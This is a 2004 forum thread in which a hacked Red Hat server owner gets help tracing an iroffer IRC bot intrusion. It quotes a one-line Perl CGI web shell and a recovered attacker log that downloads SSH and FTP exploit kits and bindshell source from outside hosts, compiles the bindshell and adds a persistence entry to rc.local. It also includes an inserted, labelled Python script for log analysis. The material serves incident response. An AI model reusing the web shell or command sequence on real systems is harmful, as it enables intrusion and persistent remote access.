IRCBOT questions / hacked
chakorules 03-19-2004, 12:06 PM I am kind of new to this forum and sort of new to Linux.
I have chkrootkit installed however it did not find anything on my server.
Someone rooted my server with an IRCbot and they are using my machine as a warez bot or something.
Generally, how does a person gain entry into a Red Hat Linux 9.0 server? I have Cpanel installed too. Any inside information about this IRCBOT would be helpful if you have dealt with this before.
The bot installed is called:
iroffer1.2b22
sprintserve 03-19-2004, 12:27 PM Iroffer is an XDCC bot that serves files. I would review the config file to find hints about the hacker.
There are a few possible entry points; the usual ones would be a vulnerable script on the server and a badly secured server.
The software installed is not representative of the entry point.
chakorules 03-19-2004, 01:04 PM and the usual would be a vulnerable script on the server and a badly secured server.
I have an admin who says he keeps everything up to date, although I dunno if I am happy with his performance... might be looking for another admin soon.
anyway. The IRCBOT is installed at:
/var/tmp/lib/lib
Being that it is not in a web access folder, could it still be an insecure script?
Knowing that my admin should have kept my server up to date and the script is not in a web folder, nor have I found an FTP transfer log of an upload, anything else?
I have some weird portsentry logins that might rattle someone's chain if they are interested in checking.
Steven 03-20-2004, 01:35 AM I have found PHP scripts to be more insecure than CGIs.
for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
can be used to track down insecure scripts.
I have an admin who says he keeps everything up to date, although I dunno if I am happy with his performance... might be looking for another admin soon.
You should have him tell you every time he updates something to make sure he's doing his job correctly.
hakkrdan 03-20-2004, 02:29 AM Yeah, or hire one of us *cough* :)
Thelinuxguy, in regards to php scripts, how so? using php's exec() or the like?
Thanks
Steven 03-20-2004, 02:43 AM system()
exec()
shell_exec()
PHPNuke has a real bad one, where the attacker can inject code into the string and execute files. It uses the My_Gallery module. Another common one uses a free shoutbox; it does the same and has hit many people here.
Crucial 03-20-2004, 05:10 AM I would find out where the iroffer is located and do this (if time is not a problem, and you would like to track down the hacker/kiddie).
1. Find the DIR
2. Find the configuration file, usually iroffer.conf
3. Use an editor and find the IRC server and channel it's servicing
4. Contact IRCops or admins of the server or network
Regarding #4 (Some networks allow this activity and some run these bots on legit and hacked machines, so if you have the extra time find out who owns this; usually the config will give passwords, usernames or IRC nicks, IRC server IPs and NickServ passwords and all kinds of relevant information pertaining to tracking down the end user)
Good Luck!
chakorules 03-20-2004, 09:55 PM Crucial
I have ALL that information. What do I do with it and how do I report it?
I thought it was useless to try and report it..
I found this information, and I enabled the LOGS...
;) in the config file...
chakorules 03-20-2004, 10:06 PM Guys...I hit a GOLD MINE.
I found in the http logs where this hacker sent a TON...I mean a TON of commands at my webserver. These are CGI and PHP hacks to check for exploits, are they not?
Here is a small sample:
- - [16/Mar/2004:18:33:15 -0500] "GET /syslog.htm?%20 HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /servlet/ContentServer? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /deskpro_v1/view.php? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /mod.php? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /cgi-bin/esp? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /cgi-bin/esp? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /admin/settings.inc.php%20 HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /cgi-bin/gm.cgi HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /tinymsg.php? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /emml_email_func.php? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /invitefriends.php3? HTTP/1.0" 404 -
chakorules 03-20-2004, 10:10 PM Originally posted by hakkrdan
From there, they are able to upload/compile a bindshell and are good to go
What do you mean by this? I saw where a bindshell was created on my server. I am really trying hard to find which script he used.
I found another script created today, inside the cgi script was this:
#!/usr/bin/perl
use CGI qw(:standard);print header;my $c=param("c");if ($c gt ""){$s=`$c 2>1`;print start_form,textfield("c",$c),submit("Terminatrix"),end_form,pre($s)}else{ print "OK!"}
What does this mean? I can not find how he uploaded or created this file today.
I looked in for PUT commands in the http access_logs and transfer logs in the FTP logs.
It's probably a script that he used to upload, right?
What does the above script do for him?
Steven 03-20-2004, 10:20 PM none of those is how it was done.
chakorules 03-20-2004, 10:26 PM That was just a SMALL sample. I scan through looking for "200" codes but couldn't find any...
Do you understand the CGI script above? What the heck does that do? I deleted this same script two days ago, and this hacker recreated it again yesterday.
sprintserve 03-20-2004, 11:03 PM The above commands are probably a list of vulnerable scripts that the hacker is checking for. Once he finds that there is indeed such a script, he probably tries to use it to exploit.
As for your admin, well too many people think up2date -u is security alone. That said, there are also far too many vulnerable scripts out there.
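Steven's one-liner above greps the domlogs for "wget", and sprintserve reads the burst of 404s as a scanner walking a list of script names. The following is an added example, not code from anyone in this thread, that does both checks over Apache common-log lines in one pass: it flags hosts producing a tight cluster of 404s and lists requests whose URL carries a download command, keeping the status code so a 200 stands out from the 404 noise. The sample log lines are constructed (the thread's sample had the client host stripped; these use documentation-range IPs), and `some_script.php` and `example.invalid` are placeholders.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Common log format with the client host present (the thread's sample had it stripped).
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
FETCH_RE = re.compile(r"(wget|curl|lynx)(%20|\+)", re.IGNORECASE)  # download command inside a URL
# Constructed sample, not from the thread: a host probing for scripts that do not exist,
# one request carrying a download command, one ordinary hit.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Mar/2004:18:33:15 -0500] "GET /syslog.htm?%20 HTTP/1.0" 404 -
203.0.113.7 - - [16/Mar/2004:18:33:15 -0500] "GET /deskpro_v1/view.php? HTTP/1.0" 404 -
203.0.113.7 - - [16/Mar/2004:18:33:16 -0500] "GET /mod.php? HTTP/1.0" 404 -
203.0.113.7 - - [16/Mar/2004:18:33:16 -0500] "GET /cgi-bin/gm.cgi HTTP/1.0" 404 -
198.51.100.9 - - [16/Mar/2004:19:02:41 -0500] "GET /some_script.php?arg=wget%20http://example.invalid/x HTTP/1.0" 200 512
192.0.2.44 - - [16/Mar/2004:19:05:00 -0500] "GET /index.html HTTP/1.0" 200 2048
"""

def parse(line):
    """One log line -> dict (host, ts, method, path, status), or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"], e["status"] = datetime.strptime(e["ts"], TS_FMT), int(e["status"])
    return e

def find_scanners(lines, threshold=4, window=timedelta(seconds=60)):
    """Hosts with at least `threshold` 404s inside `window`: the vulnerable-script probe pattern."""
    by_host = defaultdict(list)
    for e in filter(None, map(parse, lines)):
        if e["status"] == 404:
            by_host[e["host"]].append(e["ts"])
    flagged = set()
    for host, times in sorted(by_host.items()):
        times.sort()  # sliding window over consecutive 404 timestamps
        if any(times[i + threshold - 1] - times[i] <= window for i in range(len(times) - threshold + 1)):
            flagged.add(host)
    return flagged

def find_fetch_attempts(lines):
    """Requests whose URL carries a download command (the 'grep wget' check), with status kept."""
    return [(e["host"], e["path"], e["status"])
            for e in filter(None, map(parse, lines)) if FETCH_RE.search(e["path"])]

if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("probable scanners:", find_scanners(lines))
    print("download attempts:", find_fetch_attempts(lines))
```

On a real server, feed it the domlogs line by line; a fetch attempt that returned 200 rather than 404 is the request to correlate with the file timestamps in /var/tmp.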
chakorules 03-21-2004, 01:59 AM Found some more logs.
Looks like they started out at the webserver with some script that could execute. If they use ECHO doesn't that send information back to a PHP / cgi script?
echo "/path/to/whos" >> /etc/rc.d/rc.local
pwd
quit
exit
id
pwd
ls -a
cd home
ls -a
cd ..
cd home
cd myusername
ls -a
cd .kde
ls -a
cd Autostart
wget http://www.portalsecurityall.hpg.ig.com.br/exploits/0x333openssh-3.7.1p2.tar.gz
tar zxvf 0x333openssh-3.7.1p2.tar.gz
rm -rf openssh-3.7.1p2
cd /home/myusername
ls -a
cd .kde
cd Autostart
wget wget http://www.portalsecurityall.hpg.ig.com.br/exploits/ssh-exploit.tgz
tar zxvf ssh-exploit.tgz
file ssh-exploit.tgz
gunzip ssh-exploit.tgz
wget http://www.portalsecurityall.hpg.ig.com.br/exploits/wuftpd-sploit.tgz
gunzip wuftpd-sploit.tgz
dir
tar zxvf wuftpd-sploit.tar
tar
tar --help
tar x
cd /home/myusername
USER sdl2 "" "www.gsubc.org" :AB
cd /var/tmp/vi.recover/lib/lib;wget sexy-midgets.com/gotd/Chinatown.1974.DVDrip.XviD.AC3.5.1CH.CD1-WAF.tar
rm /var/tmp/vi.recover/lib/lib/index.html
ls -la /var/tmp/vi.recover/lib/lib/
ls -la /var/tmp/vi.recover/lib/lib/iroffer1.2b22
id
df -h
w
QUIT :olo
USER sdl2 "" "www.gsubc.org" :AB
cd /var/tmp/vi.recover/lib/lib/iroffer1.2b22;./iroffer -b FK-36.config
cd /var/tmp;wget http://www.areyuke.net/bindshell.c
cd /var/tmp;gcc bindshell.c -o bindshell
ls -la /var/tmp
rm /var/tmp/bindshell.c
QUIT :olo
stftk 03-21-2004, 02:07 AM They are compiling the C files using GCC, there is a very easy way to prevent them from doing this.
Type this in shell: chmod 700 /usr/bin/*cc*
This makes it so only root can compile, will not break cpanel or anything, so it will prevent this guy from being able to compile the C files.
That will prevent bindshell. As far as the other exploits, unfortunately they are extracting them to /var/tmp, so making /tmp noexec in this case wouldn't help.
Steven 03-21-2004, 02:16 AM Well, that won't prevent a bindshell if they upload an already compiled one, which is commonly done
stftk 03-21-2004, 02:22 AM But in this case look at this command which that script issues:
cd /var/tmp;gcc bindshell.c -o bindshell
So chmodding cc in this case would at least prevent further compilations.
chakorules 03-21-2004, 02:31 AM Can I remove bindshell? If so how?
admin0 03-21-2004, 03:26 AM Originally posted by chakorules
Guys...I hit a GOLD MINE.
I found in the http logs where this hacker send a TON...I mean a TON of commands at my webserver. These are CGI and PHP hacks to check for exploits are they not?
The pattern looks similar to that of "Shadow Security Scanner"..
a very powerful tool that checks your server for every known exploit.. and does 2100+ audits on any given IP/system.
disclaimer:
NO! I am not paid by the company to advertise this software.
:homer: